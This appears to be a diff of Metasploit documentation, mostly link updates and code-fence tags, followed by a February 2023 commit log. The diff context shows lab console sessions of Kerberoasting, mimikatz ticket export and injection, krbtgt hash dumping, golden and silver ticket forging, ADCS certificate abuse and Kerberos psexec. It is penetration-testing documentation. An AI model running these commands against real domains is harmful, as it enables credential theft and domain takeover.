 Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue].  For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].

 [commercial-installer]:http://metasploit.com/download
-[open-source-installer]:https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
+[open-source-installer]:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
 [kali-user-instructions]:https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
 [parrot-user-instructions]:https://parrotsec.org/docs/installation.html
 [CONTRIBUTING.md]:https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
@@ -240,14 +240,14 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
 [find]:https://linux.die.net/man/1/find
 [$PATH]:https://askubuntu.com/questions/109381/how-to-add-path-of-a-program-to-path-environment-variable

-[msf-web-service]:https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service
+[msf-web-service]:https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html

 [git-horror]:https://mikegerwitz.com/papers/git-horror-story#trust-ensure
-[signing-howto]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys#signing-howto
+[signing-howto]:https://docs.metasploit.com/docs/development/maintainers/committer-keys.html#signing-howto

 [git aliases]:https://git-scm.com/book/en/v2/Git-Basics-Git-Aliases
 [rspec]:https://www.rubyguides.com/2018/07/rspec-tutorial/
-[wiki-documentation]:https://github.com/rapid7/metasploit-framework/wiki#metasploit-development
+[wiki-documentation]:https://docs.metasploit.com/#metasploit-development
 [newbie-friendly-prs-issues]:https://github.com/rapid7/metasploit-framework/issues?q=is%3Aopen+label%3Anewbie-friendly
 [howto-PR]:https://help.github.com/articles/about-pull-requests/
 [new issue]:https://github.com/rapid7/metasploit-framework/issues/new/choose
@@ -50,7 +50,7 @@ run rhost=192.168.123.13 user=<username> pass=<password> domain=<domain>

 If you followed the lab setup setup above, this should output the following result:

-```
+```msf
 msf6 auxiliary(gather/get_user_spns) > run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local

 [*] Running for 192.168.123.13...
@@ -108,7 +108,7 @@ and cracking the hash.
 First an SPN needs to be found. This can be done in a number of ways - including using metasploit's
 very own `auxiliary/gather/ldap_query` module:

-```
+```msf
 msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.16.199.235
 RHOSTS => 172.16.199.235
@@ -169,7 +169,7 @@ Great, we now have a couple SPNs to move forward with.
 If you have a running Meterpreter session you can request a Service Ticket using the kiwi extension and one of the SPNs
 found above:

-```
+```msf
 meterpreter > load kiwi
 Loading extension kiwi...

@@ -217,7 +217,7 @@ meterpreter > kerberos_ticket_list

 **Export Service Tickets**

-```
+```msf
 meterpreter > kiwi_cmd kerberos::list /export

 [00000001] - 0x00000017 - rc4_hmac_nt
@@ -399,6 +399,6 @@ escalation is also possible as the user can be added into an elevated group such
 The new ticket can be injected back into the memory with the following Mimikatz command in order to perform
 authentication with the targeted service via Kerberos protocol.

-```
+```msf
 meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi
 ```
@@ -17,7 +17,7 @@ Metasploit currently offers Kerberos authentication for the following services -

 Open a WinRM session:

-```
+```msf
 msf6 > use auxiliary/scanner/winrm/winrm_login
 msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local

@@ -42,7 +42,7 @@ C:\Users\Administrator>

 Query LDAP for accounts:

-```
+```msf
 msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
 [*] Running module against 192.168.123.13
@@ -60,15 +60,25 @@ CN=Administrator CN=Users DC=adf3 DC=local
 Name                Attributes
 ----                ----------
 badpwdcount         0
- pwdlastset          133184302034979121
+ description         Built-in account for administering the computer/domain
+ lastlogoff          1601-01-01 00:00:00 UTC
+ lastlogon           2023-01-23 11:02:49 UTC
+ logoncount          159
+ memberof            CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local |
+                     | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm
+                     inistrators,CN=Builtin,DC=domain,DC=local
+ name                Administrator
+ objectsid           S-1-5-21-3402587289-1488798532-3618296993-500
+ pwdlastset          133189448681297271
 samaccountname      Administrator
 useraccountcontrol  512
+
 ... etc ...
 ```

 Running psexec against a host:

-```
+```msf
 msf6 > use exploit/windows/smb/psexec
 msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local

@@ -91,7 +101,7 @@ meterpreter >

 Connect to a Microsoft SQL Server instance and run a query:

-```
+```msf
 msf6 > use auxiliary/admin/mssql/mssql_sql
 msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 [*] Reloading module...
@@ -137,7 +147,7 @@ Optional options:
 When a write-enabled `KrbCacheMode` is used, tickets that are issued to Metasploit will be stored for reuse. The `klist`
 command can be used to view tickets. It is a top level command and can be run even if a module is in use.

-```
+```msf
 msf6 > klist
 Kerberos Cache
 ==============
@@ -154,7 +164,7 @@ host            principal               sname                              issue

 More detailed information can be displayed by using the verbose (`-v` / `--verbose`) option.

-```
+```msf
 msf6 > klist -v
 Kerberos Cache
 ==============
@@ -196,15 +206,17 @@ The `klist` command can also be used for deleting tickets from the cache.
 Metasploit stores tickets for future use in a user configurable way as controlled by the `KrbCacheMode` datastore
 option. When a user attempts to use Kerberos to authenticate to a remote service such as SMB, if the cache mode is
 read-enabled (e.g. set to `read-only` or `read-write`) and Metasploit is connected to a database, it will attempt to
-fetch an existing ticket using the following steps.
+fetch an existing ticket using the following steps targeting SMB for example purposes.

-1. First Metasploit will use the datastore options, including the target host and username to search though the stored
-   tickets for an SMB-specific Ticket Granting Service (TGS). If one is found, it will be used. Tickets that are expired
-   will not be used.
-2. If no TGS is found, Metasploit will repeat the search process looking for a Ticket Granting Ticket (TGT). If one is
+1. If an external ticket is specified in the `${Prefix}::Krb5Ccname` option, that ticket will be used instead of the
+   cache.
+2. When using the cache, Metasploit will first use the datastore options, including the target host and username to 
+   search though the stored tickets for an SMB-specific Ticket Granting Service (TGS). If one is found, it will be used. 
+   Tickets that are expired will not be used.
+3. If no TGS is found, Metasploit will repeat the search process looking for a Ticket Granting Ticket (TGT). If one is
   found, it will be used to contact the Key Distribution Center (KDC) and request a TGS for authentication to the SMB
   service.
-3. If no TGT is found, Metasploit will contact the KDC and authenticate using the username and password from the
+4. If no TGT is found, Metasploit will contact the KDC and authenticate using the username and password from the
   datastore to request a TGT then an SMB-specific TGS before authenticating to the SMB service.

 If the cache mode is write-enabled (e.g. set to `write-only` or `read-write`) then any ticket, either TGT or TGS that is
@@ -221,7 +233,7 @@ When a ticket (either TGT or TGS) is stored, it is saved along with the other lo
 CCACHE files can be viewed with the `loot --type mit.kerberos.ccache` command (the `--type` argument filters for the
 specified type).

-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > loot --type mit.kerberos.ccache

 Loot
@@ -254,4 +266,18 @@ Simultaneous Users: 16777216
 #
 ```

+## Using external tickets with Metasploit
+A ticket obtained outside of Metasploit can be used for authentication by setting the `${Prefix}::Krb5Ccname` option
+which is prioritized over the cache. This file must be in the [MIT Credential Cache][1] (CCACHE) file formath. If the
+ticket is in the Kirbi format, it must first be converted using the `auxiliary/admin/kerberos/ticket_converter` module.
+
+When an explicit CCACHE file is specified to load a ticket from, Metasploit will first attempt to load a TGS ticket
+from the file. If the service class of the `sname` component does not match the necessary value (e.g. the sname is for
+`HOST/dc.msflab.local` instead of `CIFS/dc.msflab.local`), the value will be patched automatically. If no TGS is found,
+Metasploit will attempt to load a TGT from the file and use it to contact the KDC and issue a TGS which will be stored
+for future use when the cache is write-enabled.
+
+It is important to set the `${Prefix}::Rhostname` and `${Prefix}Domain` options correctly because they are used to
+select the appropriate ticket from the file.
+
 [1]: http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html
@@ -857,6 +857,10 @@ NAVIGATION_CONFIG = [
            path: 'GSoC-2022-Project-Ideas.md',
            title: without_prefix('GSoC')
          },
+          {
+            path: 'GSoC-2023-Project-Ideas.md',
+            title: without_prefix('GSoC')
+          },
        ]
      },
      {
@@ -1,20 +1,18 @@
 # Metasploit Developer Documentation

-*(last updated December 1, 2014)
-
 Metasploit is actively supported by a community of hundreds of
 contributors and thousands of users world-wide. As a result, the
 accompanying documentation moves quite quickly.

 The best source of documentation on Metasploit development is
-https://github.com/rapid7/metasploit-framework/wiki. There are many
+https://docs.metasploit.com/. There are many
 treasures there, such as:

-  * [Evading Antivirus](https://github.com/rapid7/metasploit-framework/wiki/Evading-Anti-Virus)
-  * [How Payloads Work](https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work)
-  * [How to use Datastore Options](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options)
-  * [How to write browser exploits with BES](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)
-  * [How to write a bruteforcer](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Msf%3A%3AAuxiliary%3A%3AAuthBrute-to-write-a-bruteforcer)
+  * [Evading Antivirus](https://docs.metasploit.com/docs/using-metasploit/intermediate/evading-anti-virus.html)
+  * [How Payloads Work](https://docs.metasploit.com/docs/using-metasploit/basics/how-payloads-work.html)
+  * [How to use Datastore Options](https://docs.metasploit.com/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html)
+  * [How to write browser exploits with BES](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html)
+  * [How to write a bruteforcer](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html)

 ...and many, many more.

@@ -123,7 +123,7 @@ user set in the `IMPERSONATE` option (default is `Administrator`).
 ## Scenarios

 ### Windows Server 2019 Domain Controller with ADCS installed
-```
+```msf
 msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run verbose=true rhosts=192.168.100.104 username=Test password=123456 domain=mylab.local dc_name=DC02 ca=mylab-DC02-CA
 [*] Running module against 192.168.100.104

@@ -191,7 +191,7 @@ host             service  type                 name             content
 ```

 ### Using `psexec` with the TGS impersonating the Administrator
-```
+```msf
 msf6 exploit(windows/smb/psexec) > exploit rhosts=192.168.100.104 lhost=192.168.100.1 smbuser=administrator smbdomain=mylab.local Smb::Auth=kerberos Smb::Rhostname=dc02.mylab.local DomainControllerRhost=192.168.100.104


@@ -48,7 +48,7 @@ Request a certificate. The certificate PFX file will be stored on success. The c
 For this module to work, it's necessary to know the name of a CA and certificate template. These values can be obtained
 by a normal user via LDAP.

-```
+```msf
 msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
 BIND_DN => aliddle@msflab.local
@@ -82,7 +82,7 @@ msf6 auxiliary(gather/ldap_query) >
 In this scenario, an authenticated user issues a certificate for themselves using the `User` template which is available
 by default. The user must know the CA name, which in this case is `msflab-DC-CA`.

-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -122,7 +122,7 @@ The user must know:
 See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
 information.

-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -165,7 +165,7 @@ information.
 #### Step 1
 The first step is to issue a certificate using the vulnerable certificate template.

-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert 
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -195,7 +195,7 @@ The second step is to run the module a second time, using the certificate templa
 the target user. The `CERT_TEMPLATE` option is updated to one allowing authentication such as the default `User`
 template.

-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
 PFX => /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
@@ -233,7 +233,7 @@ request another certificate on behalf of the target account.
 #### Step 1
 The first step is to issue a certificate using the vulnerable certificate template.

-```
+```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -265,7 +265,7 @@ The second step is to run the module a second time, using the certificate templa
 the target user. The `CERT_TEMPLATE` option is updated to one allowing authentication such as the default `User`
 template.

-```
+```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
 PFX => /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
@@ -60,7 +60,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
 SMBUser => aliddle
 msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
 SMBPass => Password1
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options

 Module options (auxiliary/admin/dcerpc/samr_computer):

@@ -68,7 +68,7 @@ Module options (auxiliary/admin/dcerpc/samr_computer):
   ----               ---------------  --------  -----------
   COMPUTER_NAME                       no        The computer name
   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445              yes       The target port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass            Password1        no        The password for the specified username
@@ -94,7 +94,7 @@ Credentials

 host            origin          service        public             private                           realm   private_type  JtR Format
 ----            ------          -------        ------             -------                           -----   ------------  ----------
-192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password

 msf6 auxiliary(admin/dcerpc/samr_computer) >
 ```
@@ -60,7 +60,7 @@ For golden ticket attacks, the following information is required:

 One way of extracting the krbtgt account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:

-```
+```msf
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
 [*] Running module against 192.168.123.13
@@ -99,7 +99,7 @@ ADF3\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd

 With the above information a golden ticket can be forged:

-```
+```msf
 msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=767400b2c71afa35a5dca216f2389cd9 user=Administrator

 [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
@@ -146,7 +146,7 @@ Example Service Principal Names:

 One way of extracting the computer account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:

-```
+```msf
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
 [*] Running module against 192.168.123.13
@@ -185,7 +185,7 @@ ADF3\DC3$:1001:aad3b435b51404eeaad3b435b51404ee:fbd103200439e14d4c8adad675d5f244

 With the above information a silver ticket for SMB can be forged for the target host:

-```
+```msf
 msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.adf3.local

 [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
@@ -75,7 +75,7 @@ Default is `true`.

 An example of viewing the Kerberos ticket cache, and requesting a TGT with NT hash:

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > klist
 Kerberos Cache
 ==============
@@ -114,7 +114,7 @@ host             port  proto  name      state  info

 TGT with encryption key

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGT
 [*] Running module against 10.0.0.24

@@ -126,7 +126,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do

 TGT with password

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGT
 [*] Running module against 10.0.0.24

@@ -138,7 +138,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do

 TGT with certificate

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 cert_file=/home/msfuser/.msf4/loot/20230124155521_default_10.0.0.24_windows.ad.cs_384669.pfx action=GET_TGT
 [*] Running module against 10.0.0.24

@@ -153,7 +153,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) >

 TGS with NT hash:

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
 [*] Running module against 10.0.0.24

@@ -175,7 +175,7 @@ host             service  type                 name  content                   i

 TGS with encryption key:

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
 [*] Running module against 10.0.0.24

@@ -188,7 +188,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do

 TGS with password:

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
 [*] Running module against 10.0.0.24

@@ -201,7 +201,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do

 TGS with cached TGT:

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > loot

 Loot
@@ -223,7 +223,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do

 TGS without cached TGT:

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > loot

 Loot
@@ -262,7 +262,7 @@ host             service  type                 name  content                   i

 TGS impersonating the Administrator account:

-```
+```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
 [*] Running module against 10.0.0.24

@@ -16,7 +16,7 @@ Kerberos tickets can be acquired from multiple sources. For instance:
 - Forged using the `forge_ticket` module after compromising the krbtgt or a service account's encryption keys
 - Extracted from memory using Meterpreter and mimikatz:

-```
+```msf
 meterpreter > load kiwi
 Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
@@ -100,7 +100,7 @@ No other options are used in this action.

 **Without Key**

-```
+```msf
 msf6 auxiliary(admin/kerberos/inspect_ticket) > run TICKET_PATH=/path/to/ticket
 Primary Principal: Administrator@WINDOMAIN.LOCAL
 Ccache version: 4
@@ -133,7 +133,7 @@ Creds: 1

 **With Key**

-```
+```msf
 msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
 Primary Principal: Administrator@WINDOMAIN.LOCAL
 Ccache version: 4
@@ -21,7 +21,7 @@ The following actions are supported:

 ### List

-```
+```msf
 msf6 auxiliary(admin/kerberos/keytab) > run keytab_file=./example.keytab

 Keytab entries
@@ -38,7 +38,7 @@ Keytab entries

 Adding an entry using a known password hash/key which has been extracted from a Domain Controller - for instance by using the `auxiliary/gather/windows_secrets_dump` module:

-```
+```msf
 msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=krbtgt realm=DEMO.LOCAL enctype=AES256 key=e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c

 [*] modifying existing keytab
@@ -47,7 +47,7 @@ msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.key

 Adding entries using a specified password:

-```
+```msf
 msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=Administrator realm=DEMO.LOCAL enctype=ALL password=p4$$w0rd

 [*] modifying existing keytab
@@ -59,7 +59,7 @@ msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.key

 Export Kerberos encryption keys stored in the Metasploit database to a keytab file. This functionality is useful in conjunction with secrets dump

-```
+```msf
 # Secrets dump
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
@@ -137,7 +137,6 @@ should be viewable in Wireshark.
 For example the previous TGS-REQ authenticator blob is now decrypted in the Wireshark UI. Wireshark on Linux may not show
 the decrypted packet information in the packet details pane, instead it appears as a separate tab in the packet bytes pane:

-
 ```
 tgs-req
  pvno: 5
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Metasploit	83f9964e99	automatic module_metadata_base.json update	2023-02-02 12:03:09 -06:00
adfoster-r7	cfb5a55880	Land #16946 , Add row indicator to show targets command	2023-02-02 17:26:53 +00:00
Jack Heysel	af2ef53462	Land #17415 , macOS dirty cow priv esc	2023-02-02 12:15:19 -05:00
adfoster-r7	b408837b7f	Land #17575 , Load TGS tickets with a different sname	2023-02-02 17:02:48 +00:00
cgranleese-r7	d1e68e634a	Add row indicator to show targets command	2023-02-02 16:12:19 +00:00
Jack Heysel	1f224fd2d3	Rapid7 compiled binary	2023-02-02 11:11:06 -05:00
Jack Heysel	88caeddc8c	Fixed license	2023-02-02 11:10:06 -05:00
Jack Heysel	4de5e44bda	Documentation	2023-02-02 10:38:26 -05:00
Spencer McIntyre	3eaed76025	Land #17561 , Fix functions in def_iphlpapi.rb Fix input and output buffers for some mislabeled functions in def_iphlpapi.rb	2023-02-02 09:10:28 -05:00
Metasploit	2b2406f9af	automatic module_metadata_base.json update	2023-02-02 05:05:42 -06:00
adfoster-r7	952a4fe37a	Land #17581 , modules: Check datastore ForceExploit before checking if session is root	2023-02-02 10:19:07 +00:00
adfoster-r7	56866ad09a	Land #17580 , update links to new docs website	2023-02-02 10:15:10 +00:00
bcoles	6f4a17230d	exploits/osx/local/vmware_fusion_lpe: Add notes	2023-02-02 18:46:08 +11:00
bcoles	a83d070396	exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc: Add Reliability notes	2023-02-02 18:45:43 +11:00
bcoles	ef87a63bde	modules: Check datastore ForceExploit before checking if session is root	2023-02-02 18:17:02 +11:00
Grant Willcox	48a27ab555	Fix the remaining references to the old wiki site.	2023-02-01 21:25:06 -06:00
Metasploit	e752e1dbca	automatic module_metadata_base.json update	2023-02-01 18:12:49 -06:00
adfoster-r7	6870efc34a	Land #17426 , Update all references to old Wiki to point to new docs site	2023-02-01 23:49:20 +00:00
Metasploit	f128640bf1	automatic module_metadata_base.json update	2023-02-01 16:59:01 -06:00
Jack Heysel	c90a6f9068	Land #17406 , veeam_credential_dump post module Veeam Backup & Recovery and Veeam ONE Monitor credential capture post module for versions 9.x and 11.x.	2023-02-01 17:29:05 -05:00
Metasploit	4418bcc673	automatic module_metadata_base.json update	2023-02-01 16:18:56 -06:00
Jack Heysel	f4c5632b6d	Cleaned up license file	2023-02-01 17:04:26 -05:00
Jack Heysel	076ffbcc65	Merge branch 'mac_dirty_cow' of github.com:timwr/metasploit-framework into mac_dirty_cow	2023-02-01 16:57:36 -05:00
Jack Heysel	3c7cbf62e6	Updated default payload	2023-02-01 16:56:28 -05:00
jheysel-r7	6037936869	Update LICENSE	2023-02-01 16:54:04 -05:00
jheysel-r7	595f34fc6f	Merge branch 'master' into mac_dirty_cow	2023-02-01 16:51:09 -05:00
Grant Willcox	e9fef56186	Land #17481 , Update HTTP options module	2023-02-01 15:49:27 -06:00
Jack Heysel	057f046186	Updated license file	2023-02-01 16:46:45 -05:00
h00die	4ba04df138	update http options	2023-02-01 15:12:39 -06:00
Grant Willcox	b5a83ffd0f	Add in PULONG alias to PDWORD and update definitions	2023-02-01 12:36:22 -06:00
Jeffrey Martin	8d31b63f7a	update Pro version docs for 4.22.0 release	2023-02-01 12:19:59 -06:00
Metasploit	b922bb533b	automatic module_metadata_base.json update	2023-02-01 11:15:51 -06:00
adfoster-r7	014bdddd1a	Land #17564 , Fixed AnyConnect IPC message format	2023-02-01 16:34:44 +00:00
adfoster-r7	a5990a5a7d	Land #17578 , modules/exploits/openbsd Add notes and use CheckCodes messages	2023-02-01 16:26:59 +00:00
Metasploit	5af2689a0e	automatic module_metadata_base.json update	2023-02-01 10:16:55 -06:00
Jack Heysel	a6f0a8abe3	Land #17301 , module for cve-2022-1043, linux LPE This module exploits a bug in io_uring leading to an additional put_cred that can be exploited to hijack credentials of other processes.	2023-02-01 10:38:10 -05:00
Jack Heysel	690d22f759	Rapid7 compiled binary	2023-02-01 10:08:13 -05:00
Spencer McIntyre	994d41ac80	Update parts of the docs	2023-02-01 09:28:00 -05:00
adfoster-r7	5a1eb16018	Land #17574 , Use the new NDR types in RubySMB v3.2.4	2023-02-01 12:02:47 +00:00
Metasploit	4a04a86675	automatic module_metadata_base.json update	2023-02-01 05:46:09 -06:00
bcoles	86a6611e98	modules/exploits/openbsd: Add notes and use CheckCodes messages	2023-02-01 22:26:44 +11:00
adfoster-r7	1ff1cd1779	Land #17577 , modules/exploits/qnx Use AutoCheck, add Notes, resolve Rubocop violations	2023-02-01 11:20:49 +00:00
bcoles	c9012ae222	modules/exploits/qnx: Use AutoCheck, add Notes, resolve Rubocop violations	2023-02-01 20:51:44 +11:00
h00die	2c72cc145a	updates to module	2023-01-31 20:05:33 -05:00
Spencer McIntyre	84f798da32	Allow loading TGS tickets for other service names Fixes #17571	2023-01-31 17:03:25 -05:00
h00die	fa687d3614	argv instead of hardcoded payload path	2023-01-31 16:02:25 -05:00
h00die	5a374533af	cve-2022-1043	2023-01-31 16:02:25 -05:00
h00die	8d58eb6279	cve-2022-1043	2023-01-31 16:02:25 -05:00
Metasploit	42542102e3	automatic module_metadata_base.json update	2023-01-31 13:59:14 -06:00
Jack Heysel	2306736383	Land #17300 , the latest commit in PR 17300 I made a mistake and was not up to date with the latest commit in the PR before I landed, this fixes that mistake.	2023-01-31 14:18:01 -05:00
Jack Heysel	022760d24a	Land #17300 , linux LPE cve-2022-22942 module This PR adds a linux priv esc against VMWare virtual machines with kernel 4.14-rc1 - 5.17-rc1 due to a VMWare driver bug.	2023-01-31 14:07:55 -05:00
Jack Heysel	e99407fe26	Updated pre_compiled binary	2023-01-31 13:37:45 -05:00
Jeffrey Martin	9c7665a017	add GSoC 2023 to navigation	2023-01-31 11:00:26 -06:00
Grant Willcox	b866bf59c8	Land #17444 , Fix parsing of module options with special characters	2023-01-31 10:42:16 -06:00
Grant Willcox	8805ed2b5a	Last minute typo fixes	2023-01-31 10:41:47 -06:00
Jeffrey Martin	77dd6bd77e	add initial 2023 GSoC ideas doc	2023-01-31 10:18:12 -06:00
Spencer McIntyre	0d9a282237	Use the new NDR types in RubySMB v3.2.4	2023-01-31 10:08:27 -05:00
Metasploit	daa96f9fb7	automatic module_metadata_base.json update	2023-01-31 08:53:19 -06:00
adfoster-r7	56728fc7c2	Land #17573 , modules/exploits/linux/ssh Resolve Rubocop violations	2023-01-31 14:12:03 +00:00
adfoster-r7	bbf17c167c	Land #17511 , add exploit for CVE-2022-44877 command injection in CentOS Control Web Panel	2023-01-31 14:05:19 +00:00
adfoster-r7	5076518fe4	Land #17559 , add support for Ruby 3.2	2023-01-31 13:45:51 +00:00
